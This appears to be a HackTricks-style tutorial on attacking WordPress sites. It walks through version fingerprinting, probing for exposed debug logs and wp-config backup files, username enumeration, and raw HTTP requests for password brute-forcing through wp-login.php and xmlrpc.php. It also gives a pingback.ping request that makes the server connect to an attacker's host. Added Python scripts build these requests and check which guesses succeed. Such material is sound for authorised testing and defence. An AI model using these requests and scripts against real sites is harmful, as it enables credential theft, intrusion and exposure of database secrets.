
Wordpress HackTricks

WordPress Common Bugs

Introduction

What would you do if you came across a website that uses WordPress?

How to Detect

If you open https://target.com and view the page source, you will see links to WordPress themes and plugins under /wp-content/ (and, unless the site strips it, a `<meta name="generator" content="WordPress ...">` tag in the head). Alternatively, visit https://target.com/wp-login.php, which is the WordPress admin login page.

  1. Find the related CVEs by checking the core, plugin, and theme versions
    • How to find the WordPress version

      https://target.com/feed
      https://target.com/?feed=rss2

      (the RSS feed carries a <generator>https://wordpress.org/?v=X.Y.Z</generator> element; the default <meta name="generator"> tag in the page head gives the same value unless the site removes it)

    • How to find the plugin version

      https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
      https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
      https://target.com/wp-content/plugins/PLUGINNAME/README.txt
      https://target.com/wp-content/plugins/PLUGINNAME/README.TXT

      or change readme.txt to changelog.txt or readme.md (the released version is the "Stable tag:" line of the readme; PLUGINNAME is the slug that appears in the /wp-content/plugins/ asset paths of the page source)

    • How to find the theme version

      https://target.com/wp-content/themes/THEMENAME/style.css
      https://target.com/wp-content/themes/THEMENAME/readme.txt (if the theme ships a readme file)

      (the theme version is the "Version:" line of the style.css header comment)

    If you find outdated core / plugins / themes, look up the known vulnerabilities and exploits at https://wpscan.com
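The version sources listed above are all small text formats, so the fingerprinting step is easy to script. The following is an added example, not code from the original post: it parses constructed sample bodies standing in for the feed, the page source, a plugin readme.txt and a theme style.css (the slugs and version numbers in the samples are assumed, not real findings), enumerates plugin and theme slugs from asset URLs in the HTML, and compares an observed version against the release that fixed a given advisory.

```python
import re
from typing import Dict, Optional

# Constructed sample bodies standing in for the responses of the URLs listed above
# (assumed plugin/theme slugs and version numbers; they are not real findings).
SAMPLE_FEED = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Target</title>
<generator>https://wordpress.org/?v=6.4.2</generator>
</channel></rss>"""

SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel="stylesheet" href="https://target.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.4" />
<script src="https://target.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.8.4"></script>
<link rel="stylesheet" href="https://target.com/wp-content/themes/twentytwentythree/style.css?ver=1.3" />
</head></html>"""

SAMPLE_PLUGIN_README = """=== Contact Form 7 ===
Contributors: takayukister
Requires at least: 6.2
Tested up to: 6.4
Stable tag: 5.8.4
"""

SAMPLE_THEME_STYLE = """/*
Theme Name: Twenty Twenty-Three
Version: 1.3
*/
"""


def core_version_from_feed(body: str) -> Optional[str]:
    """/feed and /?feed=rss2 carry <generator>https://wordpress.org/?v=X.Y.Z</generator>."""
    m = re.search(r"<generator>https?://wordpress\.org/\?v=([\d.]+)</generator>", body)
    return m.group(1) if m else None


def core_version_from_html(body: str) -> Optional[str]:
    """The default <meta name="generator"> tag in the page head, unless the site removed it."""
    m = re.search(r'<meta\s+name="generator"\s+content="WordPress ([\d.]+)"', body, re.I)
    return m.group(1) if m else None


def plugin_version_from_readme(body: str) -> Optional[str]:
    """wp-content/plugins/<slug>/readme.txt: the 'Stable tag:' line is the released version."""
    m = re.search(r"^\s*Stable tag:\s*(\S+)", body, re.M | re.I)
    return m.group(1) if m else None


def theme_version_from_style(body: str) -> Optional[str]:
    """wp-content/themes/<slug>/style.css: the 'Version:' line of the header comment."""
    m = re.search(r"^\s*Version:\s*(\S+)", body, re.M | re.I)
    return m.group(1) if m else None


# Asset URL under /wp-content/plugins/ or /wp-content/themes/, with an optional ?ver= hint.
ASSET_RE = re.compile(
    r"""/wp-content/(plugins|themes)/([A-Za-z0-9_.-]+)/[^"'\s]*?(?:\?ver=([^"'&\s]+))?(?=["'\s])"""
)


def components_from_html(body: str) -> Dict[str, Dict[str, Optional[str]]]:
    """Enumerate plugin/theme slugs from asset URLs in the page source, keeping any ?ver= hint.
    The hint is only a lead: some plugins append the core version or strip it, so confirm
    with readme.txt / style.css before matching against advisories."""
    found: Dict[str, Dict[str, Optional[str]]] = {"plugins": {}, "themes": {}}
    for kind, slug, ver in ASSET_RE.findall(body):
        if slug not in found[kind] or found[kind][slug] is None:
            found[kind][slug] = ver or None
    return found


def is_outdated(found: str, fixed_in: str) -> bool:
    """True when the observed version sorts below the release that fixed a given advisory."""
    def parse(v: str):
        return tuple(int(p) for p in re.findall(r"\d+", v))
    return parse(found) < parse(fixed_in)


if __name__ == "__main__":
    print("core:", core_version_from_feed(SAMPLE_FEED), core_version_from_html(SAMPLE_HTML))
    print("assets:", components_from_html(SAMPLE_HTML))
    print("plugin:", plugin_version_from_readme(SAMPLE_PLUGIN_README))
    print("theme:", theme_version_from_style(SAMPLE_THEME_STYLE))
    print("cf7 < 5.9 ?", is_outdated(plugin_version_from_readme(SAMPLE_PLUGIN_README), "5.9"))
```

In practice you replace the sample strings with the bodies fetched from the target; the parsers are written to return None on a miss rather than raise, so a site that strips the generator tag or denies readme.txt simply yields no value for that source.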

  2. Finding log files

    http://target.com/wp-content/debug.log

    (written only when WP_DEBUG and WP_DEBUG_LOG are enabled in wp-config.php; it discloses PHP errors with absolute server paths, the names of installed plugins, and sometimes failed SQL queries)
  3. Finding backup files of wp-config

    http://target.com/.wp-config.php.swp
    http://target.com/wp-config.inc
    http://target.com/wp-config.old
    http://target.com/wp-config.txt
    http://target.com/wp-config.html
    http://target.com/wp-config.php.bak
    http://target.com/wp-config.php.dist
    http://target.com/wp-config.php.inc
    http://target.com/wp-config.php.old
    http://target.com/wp-config.php.save
    http://target.com/wp-config.php.swp
    http://target.com/wp-config.php.txt
    http://target.com/wp-config.php.zip
    http://target.com/wp-config.php.html
    http://target.com/wp-config.php~

    (any of these served as plain text exposes the database host, name, user and password, the auth keys and salts, and the table prefix; check the body, because a 200 on a custom error page is a false positive)
  4. Get the usernames on the website

    http://target.com/?author=1

    (with pretty permalinks on, the site redirects to /author/USERNAME/; increment the ID to walk the user table)

    or

    http://target.com/wp-json/wp/v2/users
    http://target.com/?rest_route=/wp/v2/users

    (the REST endpoint lists the id and slug of every user who has published a post; the slug is normally the login name)
  5. Bruteforce

    POST /wp-login.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded

    log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

    (a wrong password returns 200 with the login form and an error message; a correct one returns 302 to /wp-admin/ and sets a wordpress_logged_in_* cookie)

    or

    POST /xmlrpc.php HTTP/1.1
    Host: target.com
    Content-Type: text/xml

    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
        <param><value><string>admin</string></value></param>
        <param><value><string>BRUTEFORCE_IN_HERE</string></value></param>
      </params>
    </methodCall>

    (check that the interface is on first: GET /xmlrpc.php answers "XML-RPC server accepts POST requests only." when it is enabled; a wrong password returns faultCode 403 "Incorrect username or password.", a correct one returns the list of blogs)
  6. XSPA in WordPress

    POST /xmlrpc.php HTTP/1.1
    Host: target.com
    Content-Type: text/xml

    <?xml version="1.0" encoding="UTF-8"?>
    <methodCall>
      <methodName>pingback.ping</methodName>
      <params>
        <param><value><string>http://yourip:port</string></value></param>
        <param><value><string>https://target.com/</string></value></param>
      </params>
    </methodCall>

    The server fetches the source URL (the first parameter) itself, so a listener on yourip:port sees a connection coming from the WordPress host, and the fault code in the response tells you whether the fetch connected. The target URL (the second parameter) must be a post on the site that accepts pingbacks, e.g. one taken from the feed, otherwise the request is rejected before any fetch happens. Caveat: current WordPress releases fetch the source with wp_safe_remote_get(), which by default refuses ports other than 80, 443 and 8080 and hosts that resolve to private address ranges, so treat this as an out-of-band confirmation channel; port scanning of internal hosts through it is mostly blocked on up-to-date installs.
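The two XML-RPC requests above (wp.getUsersBlogs for brute force and pingback.ping for XSPA) and the wp-login.php form guess share the same shape: build the request, post it, classify the answer. The following is an added example, not code from the original post, that covers both steps 5 and 6: it generates each request body with the standard library's xmlrpc.client, and classifies constructed sample responses (shaped like the ones /xmlrpc.php returns, not captured traffic). The target host is assumed, and the meaning attached to pingback fault codes 16 and 17 is an assumption taken from WordPress's pingback handler.

```python
import xmlrpc.client
from typing import Dict, Tuple
from urllib.parse import urlencode

SITE = "http://target.com"  # assumed target, as in the requests above


def login_form_body(user: str, password: str, site: str = SITE) -> str:
    """Body of the POST /wp-login.php guess (send as application/x-www-form-urlencoded)."""
    return urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                      "redirect_to": f"{site}/wp-admin/", "testcookie": "1"})


def login_form_succeeded(status: int, headers: Dict[str, str]) -> bool:
    """A good password gives 302 to wp-admin plus a wordpress_logged_in_* cookie;
    a bad one gives 200 with the form and an error message."""
    return status == 302 and "wordpress_logged_in_" in headers.get("Set-Cookie", "")


def xmlrpc_login_call(user: str, password: str) -> str:
    """The wp.getUsersBlogs request (POST it to /xmlrpc.php as text/xml). It needs no nonce
    or cookie, which is why it is the preferred brute-force channel when it is enabled."""
    return xmlrpc.client.dumps((user, password), methodname="wp.getUsersBlogs")


def xmlrpc_login_succeeded(response_body: str) -> bool:
    """Valid credentials return an array of blogs; invalid ones return a fault (403,
    'Incorrect username or password.'), which xmlrpc.client.loads raises as Fault."""
    try:
        xmlrpc.client.loads(response_body)
        return True
    except xmlrpc.client.Fault:
        return False


def pingback_call(source: str, target: str) -> str:
    """pingback.ping(source, target): the server fetches `source` itself, so pointing it at
    yourip:port makes WordPress connect out to you. `target` must be a post on the site
    that accepts pingbacks, or the call is rejected before any fetch happens."""
    return xmlrpc.client.dumps((source, target), methodname="pingback.ping")


def pingback_result(response_body: str) -> Tuple[str, str]:
    """Classify the answer. Assumed fault-code meanings, from WordPress's pingback handler:
    16 = the source could not be fetched (no connection), 17 = it was fetched but carries
    no link back (something answered on that port); anything else is a target problem."""
    try:
        (message,), _ = xmlrpc.client.loads(response_body)
        return "registered", message
    except xmlrpc.client.Fault as fault:
        if fault.faultCode == 16:
            return "no-connection", fault.faultString
        if fault.faultCode == 17:
            return "connected", fault.faultString
        return "target-rejected", fault.faultString


# Constructed sample responses, shaped like the ones /xmlrpc.php returns (not captured traffic).
SAMPLE_LOGIN_FAIL = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True)
SAMPLE_LOGIN_OK = xmlrpc.client.dumps(
    ([{"isAdmin": True, "url": f"{SITE}/", "blogid": "1", "blogName": "Target",
       "xmlrpc": f"{SITE}/xmlrpc.php"}],), methodresponse=True)
SAMPLE_PINGBACK_CONNECTED = xmlrpc.client.dumps(
    xmlrpc.client.Fault(17, "The source URL does not contain a link to the target URL, "
                            "and so cannot be used as a source."), methodresponse=True)
SAMPLE_PINGBACK_NO_CONNECTION = xmlrpc.client.dumps(
    xmlrpc.client.Fault(16, "The source URL does not exist."), methodresponse=True)
SAMPLE_PINGBACK_OK = xmlrpc.client.dumps(
    ("Pingback from http://yourip:port to http://target.com/ registered.",), methodresponse=True)


if __name__ == "__main__":
    print(login_form_body("admin", "Password1"))
    print(xmlrpc_login_call("admin", "Password1"))
    print("login ok?", xmlrpc_login_succeeded(SAMPLE_LOGIN_OK), xmlrpc_login_succeeded(SAMPLE_LOGIN_FAIL))
    print(pingback_call("http://yourip:port", f"{SITE}/"))
    for body in (SAMPLE_PINGBACK_CONNECTED, SAMPLE_PINGBACK_NO_CONNECTION, SAMPLE_PINGBACK_OK):
        print("pingback:", pingback_result(body))
```

Rate limiting and lockout plugins usually watch wp-login.php and not xmlrpc.php, which is the practical reason to try the XML-RPC path first; the same loads()-based check is what lets a wordlist loop stop on the first non-fault response.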
  7. Register enabled

    http://example.com/wp-login.php?action=register

    (shows a sign-up form when "Anyone can register" is on under Settings > General; otherwise it answers "User registration is currently not allowed." A fresh account gets the default new-user role, normally Subscriber, which is enough to reach the many plugin bugs that require any authenticated user.)

This post is licensed under CC BY 4.0 by the author.
